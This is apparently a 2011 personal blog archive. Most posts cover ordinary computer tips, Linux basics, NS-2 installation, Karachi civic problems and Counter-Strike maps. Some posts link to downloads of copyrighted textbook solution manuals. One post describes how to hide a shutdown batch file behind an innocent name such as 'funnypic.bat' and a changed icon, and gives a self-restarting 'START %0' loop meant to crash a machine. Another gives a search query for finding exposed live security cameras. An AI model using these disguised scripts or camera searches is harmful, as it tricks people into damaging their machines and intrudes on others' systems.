
Saturday, 31 December 2011

Solution manual for Structural analysis by R.C. Hibbeler

Download solution manual for Structural analysis by R.C. Hibbeler 7th edition.This book provides students with a clear and thorough presentation of the theory and application of structural analysis as it applies to trusses, beams, and frames. Emphases are placed on teaching readers to both model and analyze a structure. A hallmark of the book, Procedures for Analysis, has been retained in this edition to provide learners with a logical, orderly method to follow when applying theory. Chapter topics include types of structures and loads, analysis of statically determinate structures, analysis of statically determinate trusses, internal loadings developed in structural members, cables and arches, influence lines for statically determinate structures, approximate analysis of statically indeterminate structures, deflections, analysis of statically indeterminate structures by the force method, displacement method of analysis: slope-deflection equations, displacement method of analysis: moment distribution, analysis of beams and frames consisting of nonprismatic members, truss analysis using the stiffness method, beam analysis using the stiffness method, and plane frame analysis using the stiffness method. For individuals planning for a career as structural engineers. (reference: amazon)

Click here to download: Structural analysis by hibbeler

Thursday, 29 December 2011

Find out amazing google searches: 'Do a barrel roll' or 'let it snow'

Google being one of the biggest search engine introduces a little fun while searching on the web. Let's start with the "tilt".

1. Type "tilt" or "askew" in the google search engine and see what happens, the screen lean to the right.

2. Type "do a barrel roll" or "Z or R Twice", it will rotate the page to 360 degree. 

Tuesday, 27 December 2011

Use your USB as a RAM

Make faster your pc by connecting your USB drive. Just follow these simple steps:

1. Connect your USB to your PC (it must be of 2Gb or more)
2. Now right click on "my computer" to open system properties dialog
3. Now go to advanced tab
4. Under performance section click "settings".
5. A performance properties open, now go to advanced tab.
6. Under virtual memory section click on "change"
7. Now virtual memory will open select your USB drive then check custom size
8. Check the space available on your drive and enter the same in initial and maximum size.
9. Now click OK and restart your PC.

Important: Don't disconnect the USB, if you want to disconnect undo all the above steps

Speed up your work with keyboard shortcuts

Easy way to speed up your work is to learn keyboard shortcuts. Following are some basic windows shortcut keys which help you to work efficiently.

CTRL + C copy
CTRL + X  cut
CTRL + f  find
CTRL + V  paste
WIN Key+D Show the desktop
WIN Key Display or hide the Start menu
WIN Key+BREAK Display the System Properties dialog box
WIN Key+M Minimize all windows.
WIN Key+Shift+M Restores minimized windows.
WIN Key+E Open My Computer
WIN Key+F Search for a file or folder
CTRL+WIN Key+F Search for computers
WIN Key+F1 Display Windows Help
WIN Key+ L Lock your computer if you are connected to a network domain, or switch users if you are not connected to a network domain
WIN Key+R Open the Run dialog box
WIN Key+U Open Utility Manager
ALT + Tab Switch between windows
CTRL + Shift + Esc Task Manager
CTRL+TAB Move forward through tabs
CTRL+SHIFT+TAB Move backward through tabs
TAB Move forward through options
SHIFT+TAB Move backward through options.
SHIFT five times Switch StickyKeys on and off
SHIFT+DELETE Delete selected item permanently without placing the item in the Recycle Bin
CTRL+RIGHT ARROW Move the insertion point to the beginning of the next word.
CTRL+LEFT ARROW  Move the insertion point to the beginning of the previous word
CTRL+DOWN ARROW Move the insertion point to the beginning of the next paragraph.
CTRL+UP ARROW Move the insertion point to the beginning of the previous paragraph.
CTRL+SHIFT with any of the arrow keys Highlight a block of text.
ALT+ESC Cycle through items in the order they were opened.
ALT+TAB Switch between open items
CTRL+A  Select all.
CTRL+ESC Display the Start menu
ALT+SPACEBAR Opens the shortcut menu for the active window
 ALT+F4 Close the active item, or quit the active program
ALT+ENTER View properties for the selected item.

Friday, 23 December 2011

Live cameras trick from google

Google allows to watch live security cameras with a simple trick just type in your search bar

inurl:view/index.shtml (it will show live traffic or airport cameras)



Click on any result to view live camera 


Thursday, 22 December 2011

Problems of public toilet in karachi

Note :As the public toilet issue in Karachi is very huge and too difficult to study, it may contain several places like public places, bus stops, van stands, cinema houses, theatre halls, markets, school, colleges, universities, railway stations, airports and so on. But in this report  the Government Hospitals & Bus Stops will be discussed and only few part of public places will be considered. The information in this report will be of 11% from internet & 89% of my own research and meeting with different people who faced this problem...

Public toilets are toilets open to anybody, in public places or in residential areas: typically there will be a charge for each use. Sometimes charging will be monthly: each users pays for a monthly ticket. Mostly users prefer to pay per time use. Users of public toilets will generally feel less ownership other user’s toilets. In
Karachi: 42% of the city’s population is without proper toilet drainage.

As Karachi is the highly dense populated city. The city has an estimated population is 13 to 15 million, while the total metropolitan areas has a population over 18 million. Large number of people daily travels through bus from on corner to the other corner of city. In this regard many people travel with staying at different stations or point. So at different stations of bus stops or lateral traveling point of common people which are usually traveled through bus or by walk, sometimes people needs toilet for their ease. In Karachi many bus stops needed toilets or a place where the human consumption rate is rarely high.
In the same manner Government Hospitals also required a lot of care of toilets in their respective departments, in order to facilitate the doctors, patient and the people who care their patients.

Public Places is also another main factor where the need of public toilets is usually high, like amusement parks, gardens, museums, towers, shopping malls, spiritual places etc. The description of the above topics will be given below with several reference context, in which it will be discussed there lack ness in the e city, importance, rehabilitation and suggestions.

People commuting different areas of city & staying at different points, visiting & circulates to their desire places need restrooms. For the sake of people easiness, toilet must be available at different to facilitate the peoples.
The following places needed immediately action from the concerned government departments for having public toilets.
These places will be discussed in this report are as follows:

Download trick for Google

There is a small trick to download anything from the google you just need to type following. Mostly it works.

parent + directory + anything that you want to download

Let me give you an example: if you want to download mp3 song of justin beiber just type

parent + directory + mp3 + justin beiber

Google will open all the directories containing mp3 songs of justin beiber. Try it now !!!

Solution manual for Engineering Economy by Leland T Blank, Anthony Tarquin, Leland Blank

Download solution manual for Engineering Economy by Leland T Blank, Anthony Tarquin, Leland Blank 6th edition.
This student-friendly text on the current economic issues particular to engineering covers the topics needed to analyze engineering alternatives. Students use both hand-worked and spreadsheet solutions of examples, problems and case studies. In this edition the options have been increased, with an expanded spreadsheet analysis component, twice the number of case studies, and virtually all new end-of-chapter problems. The chapters on factor derivation and usage, cost estimation, replacement studies, and after-tax evaluation have been heavily revised. New material is included on public sector projects and cost estimation. A reordering of chapters puts the fundamental topics up front in the text. Many chapters include a special set of problems that prepare the students for the Fundamentals of Engineering (FE) exam.
This college-level text provides students and practicing professionals with a solid preparation in the financial understanding of engineering problems and projects, as well as the techniques needed for evaluating and making sound economic decisions. Distinguishing characteristics include learning objectives for each chapter, an easy-to-read writing style, many solved examples, integrated spreadsheets, and case studies throughout the text. Graphical cross-referencing between topics and quick-solve spreadsheet solutions are indicated in the margins throughout the text. While the chapters are progressive, over three-quarters can stand alone, allowing instructors flexibility for meeting course needs. A complete online learning center (OLC) offers supplemental practice problems, spreadsheet exercises, and review questions for the Fundamentals of Engineering (FE) exam.(reference: Amazon)

Click here to download: Engg economy by blank and tarquin

Wednesday, 21 December 2011

Gul bahao organization and its Chandni ghar

Gul bahao Organization :
Gul bahao Launched in 1994 .The concept of Gul Bahao stems from two incidents in Ms Nargis Latif’s life. Following the birth of her third child, Nargis suffered immense trauma and illness and she vowed that if God relieved her of her misery, she would take a keener interest in social work. A few years later, when Ms Nargis had fully recovered and resumed normal life, she got into an argument with a garbage cleaner beneath her apartment who insisted on burning trash in a dumpsite outside her flat. Livid at why the trash had to be burned instead of disposed off in a more appropriate manner, Nargis was determined to find alternate solutions for the pestilent problem. Learning that the cost of clearing up a single garbage site was pretty steep (Rs 4,000 back then), the young Nargis took to scouring libraries for better options and eventually came to the realization that facilitating garbage disposal was not just a day’s work; it entailed a lifetime of commitment. According to Ms. Nargis : “ I realised I would have to sacrifice a cosy, comfortable family life for it “

Who is Nargis Latif ?
Born and raised in a lower middle class family, Nargis initially pursued a career in journalism. During ten years of work in that field, however, she became increasingly convinced that waste disposal problems in Karachi were assuming critical proportions and not receiving the attention that they deserved. Accordingly, in spite of resistance from her family, she decided to abandon her journalistic pursuits and devote her full energies to the search for creative and effective ways of addressing waste disposal needs. Now in her mid-forties and married with three children, Nargis has pursued her work in the waste disposal and environmental awareness fields with very limited financial support. Apart from the proceeds of commercial advertising banners in her dry trash stalls, she has developed the ventures described above as a labor of love. She regards herself, in fact, as an independent researcher engaged in a continuing search for new and better ways to convert waste and garbage into useful economic commodities. And Now She is the head of Karachi based NGO Gul Bahao for over a decade now Nargis Latif has developed a campaign to help solve the staggering waste disposal problems of the city of Karachi and to encourage broad adoption of environmentally and socially responsible waste disposal practices. The core of her initiative is an imaginative recycling program that is carefully attuned to the city's economic and social conditions.

Tuesday, 20 December 2011

How to make a map of Counter-strike 1.6

Follow these simple steps to make your own map for counter-strike 1.6

  1. So first of download these files: Hammereditor .
  2. Unzip the file.
  3. Now install hammer_v34.exe.
  4. Now copy hammer.exe present in hammer_testbuild04 folder (where you have downloaded above file).
  5. Paste this file to where you have installed hammer_v34.exe, it will ask you to replace the file click ok to do that.
  6. You have successfully installed the software,  now open the valve hammer editor.
  7. After opening  you will configuration box, here you have to configure your game. Follow these steps. 

    8.   Don't click ok this is only for Game configuration tab, now move to build programs tab.

Sunday, 18 December 2011

NS-2 Installation on FEDORA and REDHAT

The installation method of NS-2 on both fedora14 and redhat are same:

The first step was to check that the development environment was complete and
install any missing tools.
rpm -q wget
rpm -q gcc-c++
rpm -q libX11-devel
rpm -q xorg-x11-proto-devel
rpm -q libXt-devel
rpm -q libXmu-devel

From terminal login as super user type:
yum install autoconf
yum install automake
yum install gcc-c++
yum install libX11-devel

NS-2 Installation on ubuntu

First download the file and unzip it
$ wget
$ tar -xzvf ns-allinone-2.34.tar.gz
$ cd ns-allinone-2.34
Prepare the environment and install it will take a lot of time.
$ sudo apt-get install build-essential autoconf automake libxmu-dev
$ ./install

For ubuntu 9.10, export the gcc-4.3
$ export CC=gcc-4.3

Set the environment variable so that our xgraph and nam will work properly
$ gedit ~/.bashrc


Linux basic commands

Following are some basic commands use in linux system

The terminal is often called the command prompt or the shell. In days gone by, this was the way the user interacted with the computer, however Linux users have found that the use of the shell can be quicker than a graphical method and still holds some merit today.

cd       Change Directory
ls       List information about file(s)
make     Recompile a group of programs
gzip     Compress or decompress named file(s)
install  Copy files and set attributes
kill     Stop a process from running
killall  Kill processes by name
sudo     Execute a command as another user
Wget     Retrieve web pages or files via HTTP, HTTPS or FTP
Apt-get  Search for and install software packages (Debian/Ubuntu):
APT (Advanced Packaging Tool) is a powerful package management
system.APT automatically handles
dependencies and performs other operations on system packages to allow the
installation of the desired package/s.
Some common commands that can be used with APT:
Install packages:
# sudo apt-get install packagename
Remove packages:
# sudo apt-get remove packagename
Retrieve new lists of packages:
# sudo apt-get update
Upgrade system with available updates:
# sudo apt-get upgrade

Directories and file system of linux

Linux and Unix file systems are organised in a hierarchical, tree-like structure. The highest level of the file system is the / or root directory. In the Unix and Linux design philosophy, everything is considered a file - including hard disks, partitions and removable media. This means that all other files and directories (including other disks and partitions) exist under the root directory.
Underneath the root (/) directory, there is a set of important system directories that are common across most Linux distributions that are used.

The following is a listing of common directories that are directly under the root (/) directory

  •         /bin - important binary applications
  •          /boot - boot configuration files
  •          /dev - the device files
  •          /etc - configuration files, startup scripts, etc...
  •          /home - local users' home directories
  •        /lib - system libraries
  •         /lost+found - provides a lost+found system for files that exist under the root (/) directory
  •          /media - mounted (loaded) removable media such as CDs, digital cameras, etc...
  •          /mnt - mounted filesystems
  •          /opt - provides a location for optional applications to be installed
  •          /proc - special dynamic directory that maintains information about the state of the system, including currently running processes
  •          /root - root user home directory, pronounced 'slash-root'
  •         /sbin - important system binaries
  •         /sys - system files
  •          /tmp - temporary files
  •          /usr - applications and files that are mostly available for all users to access
  •          /var - variable files such as logs and databases
All of the files on a Linux system have permissions that allow or prevent others from viewing, modifying or executing. The super user "root" has the ability to access any file on the system. Each file has access restrictions, user restrictions and have an owner/group association.

The first directory we get to is /bin. Its name is derived from the word "binary." Often, the word "binary" is used to refer to executable programs or other files that contains non-readable characters. The /bin directory is where many of the system-related binaries are kept, hence the name. 

Introduction to unix and linux

UNIX is an operating system which was first developed in the 1960s, and has been under constant development ever since. By operating system, we mean the suite of programs which make the computer work. Knowledge of UNIX is required for operations which aren't covered by a graphical program, or for when there is no windows interface available, for example, in a telnet session. Unix was primarily oriented towards the command line interface, and that legacy is carried on in Linux. Thus, the graphical user interface with its windows, icons and menus are built on top of a basic command line interface. Furthermore, this means that the Linux file system is structured to be easily manageable and accessible from the command line. Many of the design conventions behind Unix also exist in Linux and are central to understanding the basics of the system

The UNIX operating system is made up of three parts:
·         The kernel
·         The shell
·         Programs

The kernel of UNIX is the hub of the operating system: it allocates time and memory to programs and handles the filestore and communications in response to system calls.

The shell acts as an interface between the user and the kernel. When a user logs in, the login program checks the username and password, and then starts another program called the shell. The shell is a command line interpreter (CLI). It interprets the commands the user types in and arranges for them to be carried out.

Linux is a free multitasking, multi-user network operating system that behaves like Unix. That means Linux is not UNIX. It is a UNIX-based operating system. It was designed specifically for the 386(x86 Intel CPU) platform and released under GNU General Public License. Linux is technically only the kernel,

How to install and run fortran programs

Tutorial: How to install and run fortran programs
  1. Go to this link
  2. Download ftn95 personal edition and install
  3. Run PLATO IDE 
  4. Go to file then click on new select FREE FORMAT FORTRAN FILE

  5.  Click open and a blank screen will appear.
  6.  Now type your program.
  7.  Click on compile button.

  8.  Now save your file.
  9.  Now click on start button.

  10. A notice will appear click yes (appears some time) else go to next step.
  11. A black window will appear displaying your output (it will take time so be patient).

Saturday, 17 December 2011

How to make a simple virus

Make a virus that shutdown your computer (actually it is not a virus its a bat file)

1. Open notepad.
2. Type this "Shutdown -s -+5"
3. Now save it as "yourfilename.bat" for exmaple funnypic.bat (note that .bat is necessary)
4. Now make it something realistic.
5. Right click on your save file and create shortcut.
6. Right click on your shortcut file and go into properties.
7. Under the shortcut tab click on change icon and change to any icon.

Note this is only for educational purpose. Don't use it to harm anyone.

Make a never ending virus. 
Warning it may cause your computer to crash, save all data before using

1. Open notepad.
2. Type this into notepad
                 START %0
                 GOTO :C
3. Follow all the above steps.


Type "Start virus.bat" and save it with "virus.bat" name 

Friday, 16 December 2011

Quakelive vs Counter-strike 1.6

Quakelive and counter strike 1.6 both are the FPS (first person shooter) multiplayer games. Both of them has a very long history. Talking about the Quakelive first, it is one of the game that can be played directly from your browser. When you signup on quakelive, it allow you to play free but if you want to enhance your abilities and skill level you can go for premium and pro level. The premium subscriptions can be purchase for €1.99 per month and pro for €3.99 per month. Quakelive is not a game with real guns like in counter strike it has something futuristic maps and guns like rockets, rails, lightning gus with teleports and jumping pads etc. There are twelve types of guns and around forty plus maps on this game, though not all of these maps are available to normal players you must have to go for premium/pro service for all maps.There are two teams red and blue team and five game modes are available for normal players.
  • Duel: for 1o1 match
  • Free for all: where all players fight for themselves. In a given time interval one must have to reach to its frag limit for win
  • CTF (capture the flag): there are two teams with flags on their bases. in order to win one team must have to bring other team flags to their base.
  • TDM (team death match): Same like Free for all, but they are divided into two teams
  • Clan area: where two teams fight like as in counter strike
  • Freezetag: for premium/pro users only, similar to clan area but instead of frag they become frozen

On the other hand Counter strike is a world's number one tactical first person shooter team based game, in which two teams terrorist and counter-terrorist equipped with different guns and gadgets, like Maverick M4A1 Carbine, Magnum Sniper Rifle (AWP), AK-47, Night-vision, bomb diffuser etc, engaged in a terrorist warfare. Counter-terrorist can win by either defusing the bomb and eliminating all terrorist or killing oor terrorist before they plant the bomb otherwise if bomb blown the terrorist will win the round. On some map there are some hostages or VIPs, by rescuing them the counter-terrorist can win the round.

Counter strike
Developers Id software Valve corporation
Engine Id tech 3 GoldSrc (half life)
Platform Windows, Mac, Linux Windows, Xbox
Genre First person shooter First person shooter
Ratings  ESRB: T  ESRB: Mature
Installation Download CD, Download
Graphics Low quality Medium/High quality
System requirements Cpu: 2Ghz Intel process or better
Ram: 128Mb
Direct X: 9
HDD space: 250Mb
Video card: Nvidia GeForce 6500/ ATI Radeon X1270
Browser: Ie8, FireFox 3.0, Google Chrome
Cpu: Pentium 4 2.53Ghz or better
Ram: 512Mb
HDD space: 2Gb
32mb+ video card
Direct X: 9
Internet Connection

Thursday, 15 December 2011

Urban and infra department NED map of Counter strike 1.6

My first ever map, created with valve hammer editor 3.5 compile with zhlt

Click here to download this map: cs_nedurban

The map is in .bsp format ... in order to run this map go to your counter-strike 1.6 folder (where you have installed it default is in C:\program files) then go to "cstrike" folder then "maps" folder and copy this file to there

Google Docs: How to use

You are working on a project or some report and you forget to save it or your software crashes and closed without saving the file or your hard disk or data storage device corrupted then google docs is one of the online easy to use word, presentation and spreadsheet editor. Through google docs many people can collaborate at a same time on a same project and you can save your important work or project online securely. The best feature of the google doc is that you can share and open your important documents from anywhere around the world. The google docs can be use between students or between teacher and students without any software, all you need is a internet connection. 
Many people prefer google docs as an alternative of Microsoft office because it is easy to use online web-based office suite, it is totally free and it can store data upto 1GB which can be access from anywhere. However keeping your documents online is insecure and you have to always connected to internet to create documents but  without paying anything its an best product online


  1. Sign to into your Gmail account.
  2. From the top menu select documents.
  3. Now from the side panel ‘create new’.
  4. Select your desired worksheet from presentation, document, spreadsheet, form,    drawing, collection.
  5. Suppose we select document.
  6. New window will open with a text editor like Microsoft word.
  7. After completing your work save the file from top with your desired name.
  8. Now if you want to share the file to any other Gmail user then click on the share button.
  9. Enter the email addresses then click ok.
  10. Your file is shared.
  11. Do this same for spreadsheet or presentation….. 

How to make a website for beginners

Do you want to create your own website? or you want your own personal webpage where you can share your thoughts, ideas, pictures, videos, sell things, blogs or whatever you want and you don't know how to create, design and build website, so you are at right place....

Lets start with some basic knowledge

For every successful website there is a lot of time and effort is needed, but as a beginner it is important that you know HTML (Hypertext Markup Language- The main building block of a website, it consist of different tags enclosed in a angle brackets for example <html>  , <body> ,  <p> etc.)
There are several sites on the web from where you can learn HTML easily. W3schools is one of the easiest way to learn. However different other websites are also present for example developphp.
After that type all your tags on a notepad or any other editor for example:
Following is an example of simple webpage:  

<title>my first web page</title>
<h2>This is my first ever web page i created</h2>

Note: Save it with ".html" file format.
When you open this save file, the file will be open

Tuesday, 13 December 2011

Solution manual for Mechanics of Materials by R.C. Hibbeler

Download solution manual for Mechanics of Materials by R.C. Hibbeler
This clear, comprehensive presentation discusses both the theory and applications of mechanics of materials. It examines the physical behavior of materials under load, then proceeds to model this behavior to development theory. Containing    Hibbeler’s hallmark student-oriented features, this book is in four-color with a photorealistic art program designed to help students/readers   visualize difficult concepts.  A clear, concise writing style and more examples than any other book further contribute to students’ /readers ability to master the material.  A useful, thorough reference for engineers and students.( reference: amazon)
Click here to download: MeM by Rc hibbeler

Sunday, 11 December 2011

Problems of U-turns in karachi

What is u-turn and why they are provided?
A U-turn in driving refers to performing a 180 degree rotation to reverse the direction of travel or the turning of a vehicle in a U-shaped course so as to face in the opposite direction. It is called a "U-turn" because the maneuver looks like the letter U.  In some areas, the maneuver is illegal, while in others it is treated as a more ordinary turn, merely extended. In still other areas lanes are occasionally marked "U-Turn only”.
In Karachi u-turns of different designs can be seen mostly on every road. The construction of these u turns on many roads of the city was aimed at providing convenience to motorists and citizens while traveling on long corridor but many people are facing problems due to u-turns. 

Advantages of u-turns:
The purpose of the construction of u-turns was to provide convenience for the drivers and for the smooth flow of traffic so that people reach their destination easily while traveling on signal free corridors. Some of the advantages of modern u-turns (separated lane u-turns) are as below:
·          1.  Easy travelling for the motorists and citizens without any interruption which was present  before the construction of separate lane u-turns.
·           2.  Increases queuing space for left-turning vehicles.
·           3. Save travel time
·          4. Free flow of the traffic (if there is no blockage)
There are many problems we are facing in our daily life during travelling from one place to another due to bad design and unplanned u-turns. For example effect of u-turn on the flow of traffic, traffic congestion and wrong way driving